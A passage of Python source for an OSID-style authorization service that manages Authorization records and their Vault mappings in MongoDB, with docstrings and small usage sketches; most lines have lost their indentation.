# Implemented from template for
# osid.resource.ResourceQuerySession.get_resources_by_query
and_list = list()
or_list = list()
for term in authorization_query._query_terms:
if '$in' in authorization_query._query_terms[term] and '$nin' in authorization_query._query_terms[term]:
and_list.append(
{'$or': [{term: {'$in': authorization_query._query_terms[term]['$in']}},
{term: {'$nin': authorization_query._query_terms[term]['$nin']}}]})
else:
and_list.append({term: authorization_query._query_terms[term]})
for term in authorization_query._keyword_terms:
or_list.append({term: authorization_query._keyword_terms[term]})
if or_list:
and_list.append({'$or': or_list})
view_filter = self._view_filter()
if view_filter:
and_list.append(view_filter)
if and_list:
query_terms = {'$and': and_list}
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(query_terms).sort('_id', DESCENDING)
else:
result = []
return objects.AuthorizationList(result, runtime=self._runtime, proxy=self._proxy)
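# A minimal standalone sketch of how ``get_authorizations_by_query`` above
# assembles its MongoDB filter document: each plain query term is ANDed, the
# keyword terms are ORed together, and the session's view filter is ANDed on
# at the end. The sample terms and Id strings below are illustrative only.
def _example_build_query_filter():
    query_terms = {'functionId': {'$in': ['function-id-string']}}
    keyword_terms = {'displayName.text': {'$regex': '.*admin.*'}}
    view_filter = {'assignedVaultIds': {'$in': ['vault-id-string']}}
    and_list = [{term: value} for term, value in query_terms.items()]
    or_list = [{term: value} for term, value in keyword_terms.items()]
    if or_list:
        and_list.append({'$or': or_list})
    if view_filter:
        and_list.append(view_filter)
    return {'$and': and_list} if and_list else {}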
class AuthorizationAdminSession(abc_authorization_sessions.AuthorizationAdminSession, osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Authorizations``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create an
``Authorization,`` an ``AuthorizationForm`` is requested using
``get_authorization_form_for_create()`` specifying the desired
relationship peers and record ``Types`` or none if no record
``Types`` are needed. The returned ``AuthorizationForm`` will
indicate that it is to be used with a create operation and can be
    used to examine metadata or validate data prior to creation. Once the
    ``AuthorizationForm`` is submitted to a create operation, it cannot
be reused with another create operation unless the first operation
was unsuccessful. Each ``AuthorizationForm`` corresponds to an
attempted transaction.
    For updates, ``AuthorizationForms`` are requested for the
    ``Authorization`` ``Id`` that is to be updated using
``getAuthorizationFormForUpdate()``. Similarly, the
``AuthorizationForm`` has metadata about the data that can be
updated and it can perform validation before submitting the update.
The ``AuthorizationForm`` can only be used once for a successful
update and cannot be reused.
The delete operations delete ``Authorizations``. To unmap an
``Authorization`` from the current ``Vault,`` the
``AuthorizationVaultAssignmentSession`` should be used. These delete
operations attempt to remove the ``Authorization`` itself thus
removing it from all known ``Vault`` catalogs.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
"""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._forms = dict()
self._kwargs = kwargs
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_create_authorizations(self):
"""Tests if this user can create ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer create
operations to unauthorized users.
return: (boolean) - ``false`` if ``Authorization`` creation is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def can_create_authorization_with_record_types(self, authorization_record_types):
"""Tests if this user can create a single ``Authorization`` using the desired record types.
While ``AuthorizationManager.getAuthorizationRecordTypes()`` can
be used to examine which records are supported, this method
tests which record(s) are required for creating a specific
``Authorization``. Providing an empty array tests if an
``Authorization`` can be created with no records.
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (boolean) - ``true`` if ``Authorization`` creation using
the specified ``Types`` is supported, ``false``
otherwise
raise: NullArgument - ``authorization_record_types`` is
``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resource_with_record_types
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_authorization_form_for_create_for_agent(self, agent_id, function_id, qualifier_id, authorization_record_types):
"""Gets the authorization form for creating new authorizations.
A new form should be requested for each create transaction.
arg: agent_id (osid.id.Id): the agent ``Id``
arg: function_id (osid.id.Id): the function ``Id``
arg: qualifier_id (osid.id.Id): the qualifier ``Id``
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``agent_id, function_id`` or ``qualifier_id``
is not found
raise: NullArgument - ``agent_id, function_id, qualifier_id``
or ``authorization_record_types`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
if not isinstance(agent_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(function_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(qualifier_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
for arg in authorization_record_types:
if not isinstance(arg, ABCType):
raise errors.InvalidArgument('one or more argument array elements is not a valid OSID Type')
if authorization_record_types == []:
# WHY are we passing vault_id = self._catalog_id below, seems redundant:
# We probably also don't need to send agent_id. The form can now get that from the proxy
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
agent_id=agent_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
else:
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
record_types=authorization_record_types,
agent_id=agent_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
obj_form._for_update = False
self._forms[obj_form.get_id().get_identifier()] = not CREATED
return obj_form
@utilities.arguments_not_none
def get_authorization_form_for_create_for_resource(self, resource_id, function_id, qualifier_id, authorization_record_types):
"""Gets the authorization form for creating new authorizations.
A new form should be requested for each create transaction.
arg: resource_id (osid.id.Id): the resource ``Id``
arg: function_id (osid.id.Id): the function ``Id``
arg: qualifier_id (osid.id.Id): the qualifier ``Id``
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``resource_id, function_id`` or
``qualifier_id`` is not found
raise: NullArgument - ``resource_id, function_id,
qualifier_id,`` or ``authorization_record_types`` is
``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
if not isinstance(resource_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(function_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
if not isinstance(qualifier_id, ABCId):
raise errors.InvalidArgument('argument is not a valid OSID Id')
for arg in authorization_record_types:
if not isinstance(arg, ABCType):
raise errors.InvalidArgument('one or more argument array elements is not a valid OSID Type')
if authorization_record_types == []:
# WHY are we passing vault_id = self._catalog_id below, seems redundant:
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
resource_id=resource_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
                proxy=self._proxy)
else:
obj_form = objects.AuthorizationForm(
vault_id=self._catalog_id,
record_types=authorization_record_types,
resource_id=resource_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
obj_form._for_update = False
self._forms[obj_form.get_id().get_identifier()] = not CREATED
return obj_form
@utilities.arguments_not_none
def get_authorization_form_for_create_for_resource_and_trust(self, resource_id, trust_id, function_id, qualifier_id, authorization_record_types):
"""Gets the authorization form for creating new authorizations.
A new form should be requested for each create transaction.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: trust_id (osid.id.Id): an ``Id`` for a circle of trust
arg: function_id (osid.id.Id): a function ``Id``
arg: qualifier_id (osid.id.Id): the qualifier ``Id``
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (osid.authorization.AuthorizationForm) - the
authorization form
        raise: NotFound - ``resource_id, trust_id, function_id,`` or
            ``qualifier_id`` is not found
        raise: NullArgument - ``resource_id, trust_id,
            function_id, qualifier_id`` or
            ``authorization_record_types`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def create_authorization(self, authorization_form):
"""Creates a new explicit ``Authorization``.
arg: authorization_form
(osid.authorization.AuthorizationForm): the
authorization form
        return: (osid.authorization.Authorization) - the new
``Authorization``
raise: IllegalState - ``authorization_form`` already used in a
create transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``authorization_form`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - ``authorization_form`` did not originate
from this service
*compliance: mandatory -- This method must be implemented.*
"""
# TODO: not using the create_resource template
# because want to prevent duplicate authorizations
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_form, ABCAuthorizationForm):
raise errors.InvalidArgument('argument type is not an AuthorizationForm')
if authorization_form.is_for_update():
raise errors.InvalidArgument('the AuthorizationForm is for update only, not create')
try:
if self._forms[authorization_form.get_id().get_identifier()] == CREATED:
raise errors.IllegalState('authorization_form already used in a create transaction')
except KeyError:
raise errors.Unsupported('authorization_form did not originate from this session')
if not authorization_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
# try to check first here
try:
osid_map = collection.find_one({"agentId": authorization_form._my_map['agentId'],
"functionId": authorization_form._my_map['functionId'],
"qualifierId": authorization_form._my_map['qualifierId'],
"assignedVaultIds": authorization_form._my_map['assignedVaultIds']})
osid_map['startDate'] = authorization_form._my_map['startDate']
osid_map['endDate'] = authorization_form._my_map['endDate']
collection.save(osid_map)
except errors.NotFound:
insert_result = collection.insert_one(authorization_form._my_map)
self._forms[authorization_form.get_id().get_identifier()] = CREATED
osid_map = collection.find_one({'_id': insert_result.inserted_id})
result = objects.Authorization(
osid_object_map=osid_map,
runtime=self._runtime,
proxy=self._proxy)
return result
def can_update_authorizations(self):
"""Tests if this user can update ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating an
``Authorization`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
update operations to an unauthorized user.
return: (boolean) - ``false`` if authorization modification is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_update_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_authorization_form_for_update(self, authorization_id):
"""Gets the authorization form for updating an existing authorization.
A new authorization form should be requested for each update
transaction.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.get_resource_form_for_update_template
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
if (authorization_id.get_identifier_namespace() != 'authorization.Authorization' or
authorization_id.get_authority() != self._authority):
raise errors.InvalidArgument()
result = collection.find_one({'_id': ObjectId(authorization_id.get_identifier())})
obj_form = objects.AuthorizationForm(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
self._forms[obj_form.get_id().get_identifier()] = not UPDATED
return obj_form
@utilities.arguments_not_none
def update_authorization(self, authorization_form):
"""Updates an existing authorization.
arg: authorization_form
(osid.authorization.AuthorizationForm): the
authorization ``Id``
raise: IllegalState - ``authorization_form`` already used in an
update transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``authorization_form`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - ``authorization_form`` did not originate
from ``get_authorization_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.update_resource_template
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_form, ABCAuthorizationForm):
raise errors.InvalidArgument('argument type is not an AuthorizationForm')
if not authorization_form.is_for_update():
raise errors.InvalidArgument('the AuthorizationForm is for update only, not create')
try:
if self._forms[authorization_form.get_id().get_identifier()] == UPDATED:
raise errors.IllegalState('authorization_form already used in an update transaction')
except KeyError:
raise errors.Unsupported('authorization_form did not originate from this session')
if not authorization_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
collection.save(authorization_form._my_map)
self._forms[authorization_form.get_id().get_identifier()] = UPDATED
# Note: this is out of spec. The OSIDs don't require an object to be returned:
return objects.Authorization(
osid_object_map=authorization_form._my_map,
runtime=self._runtime,
proxy=self._proxy)
def can_delete_authorizations(self):
"""Tests if this user can delete ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting an
``Authorization`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
delete operations to an unauthorized user.
return: (boolean) - ``false`` if ``Authorization`` deletion is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_delete_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def delete_authorization(self, authorization_id):
"""Deletes the ``Authorization`` identified by the given ``Id``.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization`` to delete
raise: NotFound - an ``Authorization`` was not found identified
by the given ``Id``
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.delete_resource_template
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
authorization_map = collection.find_one(
dict({'_id': ObjectId(authorization_id.get_identifier())},
**self._view_filter()))
objects.Authorization(osid_object_map=authorization_map, runtime=self._runtime, proxy=self._proxy)._delete()
collection.delete_one({'_id': ObjectId(authorization_id.get_identifier())})
def can_manage_authorization_aliases(self):
"""Tests if this user can manage ``Id`` aliases for ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Authorization`` aliasing is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def alias_authorization(self, authorization_id, alias_id):
"""Adds an ``Id`` to an ``Authorization`` for the purpose of creating compatibility.
The primary ``Id`` of the ``Authorization`` is determined by the
provider. The new ``Id`` performs as an alias to the primary
        ``Id``. If the alias is a pointer to another authorization, it
is reassigned to the given authorization ``Id``.
arg: authorization_id (osid.id.Id): the ``Id`` of an
``Authorization``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is already assigned
raise: NotFound - ``authorization_id`` not found
raise: NullArgument - ``authorization_id`` or ``alias_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.alias_resources_template
self._alias_id(primary_id=authorization_id, equivalent_id=alias_id)
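# A hypothetical usage sketch (not part of the OSID API) of the one-shot form
# lifecycle enforced by AuthorizationAdminSession above: request a form, submit
# it exactly once to create_authorization(), then request a fresh form for any
# update. The session and Ids are assumed to come from a configured runtime.
def _example_create_then_update(admin_session, agent_id, function_id, qualifier_id):
    create_form = admin_session.get_authorization_form_for_create_for_agent(
        agent_id, function_id, qualifier_id, [])
    authorization = admin_session.create_authorization(create_form)
    update_form = admin_session.get_authorization_form_for_update(
        authorization.get_id())
    return admin_session.update_authorization(update_form)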
class AuthorizationVaultSession(abc_authorization_sessions.AuthorizationVaultSession, osid_sessions.OsidSession):
"""This session provides methods to retrieve ``Authorization`` to ``Vault`` mappings.
An ``Authorization`` may appear in multiple ``Vaults``. Each
``Vault`` may have its own authorizations governing who is allowed
to look at it.
This lookup session defines several views:
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete result set or is an error
condition
"""
_session_namespace = 'authorization.AuthorizationVaultSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession._init_catalog(self, proxy, runtime)
self._catalog_view = COMPARATIVE
self._kwargs = kwargs
def use_comparative_vault_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_vault_view(self):
"""A complete view of the ``Authorization`` and ``Vault`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
def can_lookup_authorization_vault_mappings(self):
"""Tests if this user can perform lookups of authorization/vault mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known lookup methods in
this session will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
lookup operations to unauthorized users.
return: (boolean) - ``false`` if looking up mappings is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.can_lookup_resource_bin_mappings
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_authorization_ids_by_vault(self, vault_id):
"""Gets the list of ``Authorization`` ``Ids`` associated with a ``Vault``.
arg: vault_id (osid.id.Id): ``Id`` of a ``Vault``
return: (osid.id.IdList) - list of related authorization ``Ids``
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resource_ids_by_bin
id_list = []
for authorization in self.get_authorizations_by_vault(vault_id):
id_list.append(authorization.get_id())
return IdList(id_list)
@utilities.arguments_not_none
def get_authorizations_by_vault(self, vault_id):
"""Gets the list of ``Authorizations`` associated with a ``Vault``.
arg: vault_id (osid.id.Id): ``Id`` of a ``Vault``
return: (osid.authorization.AuthorizationList) - list of related
authorization
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resources_by_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
        lookup_session = mgr.get_authorization_lookup_session_for_vault(vault_id, proxy=self._proxy)
lookup_session.use_isolated_vault_view()
return lookup_session.get_authorizations()
@utilities.arguments_not_none
    def get_authorization_ids_by_vaults(self, vault_ids):
"""Gets the list of ``Authorization Ids`` corresponding to a list of ``Vault`` objects.
arg: vault_ids (osid.id.IdList): list of vault ``Ids``
return: (osid.id.IdList) - list of authorization ``Ids``
raise: NullArgument - ``vault_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resource_ids_by_bin
id_list = []
        for authorization in self.get_authorizations_by_vaults(vault_ids):
id_list.append(authorization.get_id())
return IdList(id_list)
@utilities.arguments_not_none
    def get_authorizations_by_vaults(self, vault_ids):
        """Gets the list of ``Authorizations`` corresponding to a list of ``Vaults``.
arg: vault_ids (osid.id.IdList): list of vault ``Ids``
return: (osid.authorization.AuthorizationList) - list of
authorizations
raise: NullArgument - ``vault_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resources_by_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_authorization_lookup_session_for_vault(vault_ids, proxy=self._proxy)
lookup_session.use_isolated_vault_view()
return lookup_session.get_authorizations()
@utilities.arguments_not_none
def get_vault_ids_by_authorization(self, authorization_id):
"""Gets the list of ``Vault`` ``Ids`` mapped to an ``Authorization``.
arg: authorization_id (osid.id.Id): ``Id`` of an
``Authorization``
return: (osid.id.IdList) - list of vault ``Ids``
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_bin_ids_by_resource
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_authorization_lookup_session(proxy=self._proxy)
lookup_session.use_federated_vault_view()
authorization = lookup_session.get_authorization(authorization_id)
id_list = []
for idstr in authorization._my_map['assignedVaultIds']:
id_list.append(Id(idstr))
return IdList(id_list)
@utilities.arguments_not_none
def get_vault_by_authorization(self, authorization_id):
"""Gets the list of ``Vault`` objects mapped to an ``Authorization``.
arg: authorization_id (osid.id.Id): ``Id`` of an
``Authorization``
return: (osid.authorization.VaultList) - list of vault
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
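# A hypothetical usage sketch (not part of the OSID API) for the
# Authorization/Vault mapping lookups above; OsidLists in this implementation
# behave as Python iterators, so the Ids can be drained into a plain list.
def _example_vault_ids_for_authorization(vault_session, authorization_id):
    return [vault_id for vault_id in
            vault_session.get_vault_ids_by_authorization(authorization_id)]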
class AuthorizationVaultAssignmentSession(abc_authorization_sessions.AuthorizationVaultAssignmentSession, osid_sessions.OsidSession):
"""This session provides methods to re-assign ``Authorizations`` to ``Vault``.
An ``Authorization`` may map to multiple ``Vault`` objects and
removing the last reference to a ``Authorization`` is the equivalent
of deleting it. Each ``Vault`` may have its own authorizations
governing who is allowed to operate on it.
Moving or adding a reference of a ``Authorization`` to another
    ``Vault`` is not a copy operation (e.g., it does not change its ``Id``).
"""
_session_namespace = 'authorization.AuthorizationVaultAssignmentSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession._init_catalog(self, proxy, runtime)
self._catalog_name = 'Vault'
self._forms = dict()
self._kwargs = kwargs
def can_assign_authorizations(self):
"""Tests if this user can alter authorization/vault mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known mapping methods in
this session will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
assignment operations to unauthorized users.
return: (boolean) - ``false`` if mapping is not authorized,
``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.can_assign_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def can_assign_authorizations_to_vault(self, vault_id):
"""Tests if this user can alter authorization/vault mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known mapping methods in
this session will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
assignment operations to unauthorized users.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
return: (boolean) - ``false`` if mapping is not authorized,
``true`` otherwise
raise: NullArgument - ``vault_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.can_assign_resources_to_bin
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if vault_id.get_identifier() == '000000000000000000000000':
return False
return True
@utilities.arguments_not_none
def get_assignable_vault_ids(self, vault_id):
"""Gets a list of vault including and under the given vault node in which any authorization can be assigned.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
return: (osid.id.IdList) - list of assignable vault ``Ids``
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids
# This will likely be overridden by an authorization adapter
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_vault_lookup_session(proxy=self._proxy)
vaults = lookup_session.get_vaults()
id_list = []
for vault in vaults:
id_list.append(vault.get_id())
return IdList(id_list)
@utilities.arguments_not_none
def get_assignable_vault_ids_for_authorization(self, vault_id, authorization_id):
"""Gets a list of vault including and under the given vault node in which a specific authorization can be assigned.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
return: (osid.id.IdList) - list of assignable vault ``Ids``
raise: NullArgument - ``vault_id`` or ``authorization_id`` is
``null``
raise: OperationFailed - unable to complete request
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids_for_resource
# This will likely be overridden by an authorization adapter
return self.get_assignable_vault_ids(vault_id)
@utilities.arguments_not_none
def assign_authorization_to_vault(self, authorization_id, vault_id):
"""Adds an existing ``Authorization`` to a ``Vault``.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
raise: AlreadyExists - ``authorization_id`` is already assigned
to ``vault_id``
raise: NotFound - ``authorization_id`` or ``vault_id`` not
found
raise: NullArgument - ``authorization_id`` or ``vault_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_vault_lookup_session(proxy=self._proxy)
lookup_session.get_vault(vault_id) # to raise NotFound
self._assign_object_to_catalog(authorization_id, vault_id)
@utilities.arguments_not_none
def unassign_authorization_from_vault(self, authorization_id, vault_id):
"""Removes an ``Authorization`` from a ``Vault``.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
raise: NotFound - ``authorization_id`` or ``vault_id`` not
found or ``authorization_id`` not assigned to
``vault_id``
raise: NullArgument - ``authorization_id`` or ``vault_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.unassign_resource_from_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_vault_lookup_session(proxy=self._proxy)
lookup_session.get_vault(vault_id) # to raise NotFound
self._unassign_object_from_catalog(authorization_id, vault_id)
@utilities.arguments_not_none
def reassign_authorization_to_vault(self, authorization_id, from_vault_id, to_vault_id):
"""Moves an ``Authorization`` from one ``Vault`` to another.
Mappings to other ``Vaults`` are unaffected.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
arg: from_vault_id (osid.id.Id): the ``Id`` of the current
``Vault``
arg: to_vault_id (osid.id.Id): the ``Id`` of the destination
``Vault``
raise: NotFound - ``authorization_id, from_vault_id,`` or
``to_vault_id`` not found or ``authorization_id`` not
mapped to ``from_vault_id``
raise: NullArgument - ``authorization_id, from_vault_id,`` or
``to_vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.reassign_resource_to_bin
self.assign_authorization_to_vault(authorization_id, to_vault_id)
try:
self.unassign_authorization_from_vault(authorization_id, from_vault_id)
except: # something went wrong, roll back assignment to to_vault_id
